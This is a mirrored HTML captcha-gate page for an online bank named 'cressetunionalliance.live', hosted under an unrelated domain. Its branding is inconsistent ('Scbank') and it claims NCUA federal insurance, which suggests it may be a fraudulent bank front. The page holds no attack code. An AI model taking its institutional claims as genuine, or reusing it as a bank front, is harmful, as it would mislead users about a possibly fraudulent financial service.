  

<!DOCTYPE html>
<html lang="en-US" class="js">

<!-- Mirrored from cressetunionalliance.live.geraldwhitesaving.com/myaccount/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 14:30:11 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>  
    <meta charset="utf-8">
    <meta name="author" content="Softnio">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="cressetunionalliance.live is federally insured by the National Credit Union Administration. We do business in accordance with the Fair Housing Law and Equal opportunity Credit Act.">
    <link rel="shortcut icon" href="images/favicon.png" type="image/x-icon">
    <!-- Fav Icon  -->
    <link rel="shortcut icon" href="images/favicon.png">
    <!-- Page Title  -->
    <title>Welcome to  |  cressetunionalliance.live</title>
    <!-- StyleSheets  -->
    <link rel="stylesheet" href="assets/css/dashlite8d5a.css?ver=2.4.0">
    <link rel="stylesheet" href="assets/loader.css">
    <link rel="stylesheet" href="scss/sweetalert.css">
    <link id="skin-default" rel="stylesheet" href="assets/css/theme8d5a.css?ver=2.4.0">
     <link href="css/toastr.css" rel="stylesheet"/>
</head>
<script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
}
</script>
<script type="text/javascript" src="../../translate.google.com/translate_a/elementa0d8.js?cb=googleTranslateElementInit"></script>
    <style>
.goog-te-gadget-simple {
border:none;
}
.goog-te-gadget-simple a {
color:#000;
}
</style>
<style type="text/css">
    .btn-primary{
        background-color: #3140fc;
    }
    .btn-secondary{
        background-color: #d13636;
    }
    .btn-secondary:hover{opacity: 0.6;}
    .btn-primary:hover{opacity: 0.6;}
</style>
<body class="nk-body npc-crypto bg-white pg-auth">
    <!-- app body @s -->
    <div class="nk-app-root">
        <div class="justify-center card-header">
            <div class="nk-split-content nk-block-area nk-block-area-column nk-auth-container bg-white">
                <div class="absolute-top-right d-lg-none p-3 p-sm-5">
                    <a href="#" class="toggle btn-white btn btn-icon btn-light" data-target="athPromo"><em class="icon ni ni-info"></em></a>
                </div>
                <div class="nk-block nk-block-middle nk-auth-body">
                    <center class="brand-logo pb-5">
                        <a href="#" class="logo-link">
                            <img class="logo-light logo-img logo-img-lg" src="logo.png" srcset="logo.png" alt="logo">
                            <img class="logo-dark logo-img logo-img-lg" src="logo.png" srcset="logo.png" alt="logo-dark">
                        </a>
                    </center>
                    <br>
                                        <div class="nk-block-head">
                        <div class="nk-block-head-content">
                            <h3 class="nk-block-title">Welcome</h3>
                            <div class="nk-block-des alert alert-pro alert-primary">
                                <p class="alert-text">Please confirm you are not a Robot by verifying the auto-generated code below, This will enable you have  access to Scbank Online banking channels.</p>
                            </div>
                        </div>
                    </div><!-- .nk-block-head -->
    <form action="https://cressetunionalliance.live.geraldwhitesaving.com/myaccount/scripts/auth?action=verifyRecaptcha&amp;code=197107" id="verifyForm" method="post">
        <div class="form-group">
        <link href="https://fonts.googleapis.com/css?family=Henny+Penny&amp;display=swap" rel="stylesheet">
        <div style="height: 46px; line-height: 46px; width:100%; text-align: center; background-color: #3140fc; color: #ffffff!important; font-size: 26px; font-weight: bold; letter-spacing: 20px; font-family: 'Henny Penny', cursive;  -webkit-user-select: none; -moz-user-select: none;-ms-user-select: none;user-select: none;  display: flex; justify-content: center;" class="captcha"><span style="    float:left;     -webkit-transform: rotate(55deg);">1</span><span style="    float:left;     -webkit-transform: rotate(17deg);">9</span><span style="    float:left;     -webkit-transform: rotate(-56deg);">7</span><span style="    float:left;     -webkit-transform: rotate(-51deg);">1</span><span style="    float:left;     -webkit-transform: rotate(0deg);">0</span><span style="    float:left;     -webkit-transform: rotate(-45deg);">7</span></div><input type="hidden" name="captcha_secret" value="da6f040a13868b805eb3654ba0607afef7fa0c157ee5c3a5352eb625efb7bd32"></div>

    <div class="form-group">
        <input type="text" name="captcha" id="captcha" class="form-control form-control-xl" placeholder="Enter code" autocomplete="off" required>
    </div>   
    <div id="verifyResult"></div>
                        <div class="form-group">
                            <button class="btn btn-lg btn-primary btn-block secretFom" id="btn" type="submit" >Verify code</button>
                        </div>
                    </form><!-- form -->
                                </div><!-- .nk-block -->
                <div class="nk-block nk-auth-footer" style="margin-top:80px;">
                    <a href="#" style=""><div id="google_translate_element"></div> </a>
                   <div class="mt-3">
                        <p>&copy; 2023 cressetunionalliance.live. All Rights Reserved.</p>
                    </div>
                </div>
            </div>
 
        </div>
    </div>

    <!-- JavaScript -->
    <script src="js/jquery.min.js"></script>
    <script type="text/javascript">
    $(document).ready(function (e) {
    $("#verifyForm").on('submit',(function(e) {
        document.getElementById("btn").disabled = true;
        e.preventDefault();
        $.ajax({
            url: "scripts/auth?action=verifyRecaptcha&code=197107",
            type: "POST",
            data:  new FormData(this),
            contentType: false,
            cache: false,
            processData:false,
            success: function(data)
            {
            $("#verifyResult").html(data);
            document.getElementById("btn").disabled = false;
            },
            error: function() 
            {
            }           
       });
    }));
});
</script>
    <script src="assets/js/bundle8d5a.js?ver=2.4.0"></script>
    <script src="assets/js/scripts8d5a.js?ver=2.4.0"></script>
   <script src="js/vendors/sweetalert.js"></script>
   <script src="assets/js/custom.js"></script>
   <script src="js/toastr.js"></script>
</body>

<!-- Mirrored from cressetunionalliance.live.geraldwhitesaving.com/myaccount/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 14:30:11 GMT -->
</html>